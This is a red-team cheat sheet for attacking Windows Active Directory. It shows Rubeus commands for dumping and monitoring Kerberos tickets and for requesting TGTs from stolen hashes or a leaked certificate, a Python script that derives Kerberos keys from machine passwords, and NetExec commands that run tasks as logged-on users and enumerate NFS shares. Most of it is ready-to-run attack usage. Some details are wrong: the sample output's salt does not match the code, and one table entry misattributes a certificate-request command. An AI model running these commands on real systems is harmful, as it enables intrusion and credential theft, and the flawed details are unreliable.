Tool cheat sheet
Rubeus
Instead of LSASS handles, Rubeus uses Windows APIs, making it "less" noisy.
When dumping or requesting Kerberos tickets, use `/nowrap` to make copy/pasting easier.
| Command | Privileges | Description |
|---|---|---|
| triage | User/Admin | List Kerberos tickets of the current session or of all sessions (if admin rights are present) |
| dump | User/Admin | Dump Kerberos tickets from the current session or all sessions. Add `/service:` / `/luid:` to only dump a specific ticket (run `Rubeus.exe triage` first to find them). |
| monitor | Admin | Actively monitor for tickets being cached and dump them: `Rubeus.exe monitor /interval:seconds /nowrap` (remember to stop it). |
| hash | User | Create valid hashes for a user or machine account. Example: `hash /user:user /password:password /domain:domain` |
| asktgt | User | Ask the DC for a valid TGT using an NTLM or AES hash |
| request | User | Ask the CA for a user certificate (supply both `/ca:` and `/template:`) |
```powershell
# Request TGTs and put them into a netlogon session (password, rc4, aes hash, certificate)
Rubeus.exe asktgt /createnetonly:cmd.exe /show /user:TODO /password:TODO
Rubeus.exe asktgt /createnetonly:cmd.exe /show /user:TODO /rc4:TODO
Rubeus.exe asktgt /createnetonly:cmd.exe /show /user:TODO /aes256:TODO
Rubeus.exe asktgt /createnetonly:cmd.exe /show /user:TODO /certificate:C:\temp\leaked.pfx
# Monitor / read tickets (e.g. kerberos delegation)
Rubeus.exe monitor /nowrap /interval:30
Rubeus.exe triage /nowrap
```

Convert HEX computer machine password to AES key for Rubeus
https://snovvcrash.rocks/2021/05/21/calculating-kerberos-keys.html
```python
#!/usr/bin/env python3
# Derive the Kerberos keys (RC4/NT hash, AES128, AES256) of a user or
# machine account from its password, using impacket's string_to_key.
from binascii import unhexlify, hexlify
from impacket.krb5 import constants
from impacket.krb5.crypto import Key, string_to_key
from Cryptodome.Hash import MD4

allciphers = {
    'rc4_hmac_nt': int(constants.EncryptionTypes.rc4_hmac.value),
    'aes128_hmac': int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),
    'aes256_hmac': int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value)
}


def printKerberosKeys(password, salt):
    # password: UTF-16-LE bytes; salt: the AD default salt of the account
    for name, cipher in allciphers.items():
        if cipher == 23:
            # RC4 key == NT hash == MD4 over the UTF-16-LE password
            md4 = MD4.new()
            md4.update(password)
            key = Key(cipher, md4.digest())
        else:
            # AES string-to-key expects the password as UTF-8
            fixedPassword = password.decode('utf-16-le', 'replace').encode('utf-8', 'replace')
            key = string_to_key(cipher, fixedPassword, salt)
        print(f' * {name}: {hexlify(key.contents).decode("utf-8")}')


def printMachineKerberosKeys(domain, hostname, hexpassword):
    # Machine salt: REALM + 'host' + hostname + '.' + domain; password is the hex of the UTF-16-LE machine password
    salt = b'%shost%s.%s' % (domain.upper().encode('utf-8'), hostname.lower().encode('utf-8'), domain.lower().encode('utf-8'))
    rawpassword = unhexlify(hexpassword)
    print(f'{domain.upper()}\\{hostname.upper()}$')
    print(f' * Salt: {salt.decode("utf-8")}')
    printKerberosKeys(rawpassword, salt)


def printUserKerberosKeys(domain, username, rawpassword):
    # User salt: REALM + username (case preserved); plain-text password
    salt = b'%s%s' % (domain.upper().encode('utf-8'), username.encode('utf-8'))
    rawpassword = rawpassword.encode('utf-16-le')
    print(f'{domain.upper()}\\{username}')
    print(f' * Salt: {salt.decode("utf-8")}')
    printKerberosKeys(rawpassword, salt)


printMachineKerberosKeys("lab.internal", "hostname", "<hex-machinepassword>")
```

Output:
```powershell
PS & C:/Users/User/python3.12.exe "c:/Users/User/Untitled-1.py"
LAB.INTERNAL\<HOSTNAME>$
 * Salt: LAB.INTERNALhosthostnamelab.internal
 * rc4_hmac_nt: <rc4_hmac_nt>
 * aes128_hmac: <aes128_hmac>
 * aes256_hmac: <aes256_hmac>
```

NetExec
Get logged-on users:

```powershell
# List users logged on to the target
nxc smb IP -u username -p 'pwd' --loggedon-users
# Execute a scheduled task as a logged-on user:
nxc smb IP -u username -p 'pwd' -M schtask_as -o USER=usr1 CMD=whoami
```

Enumerate NFS shares:
```powershell
# Enumerate shares on target ip
nxc nfs <ip> --shares
# List files of a file share
nxc nfs <ip> --share '/var/nfs/general' --ls '/'
```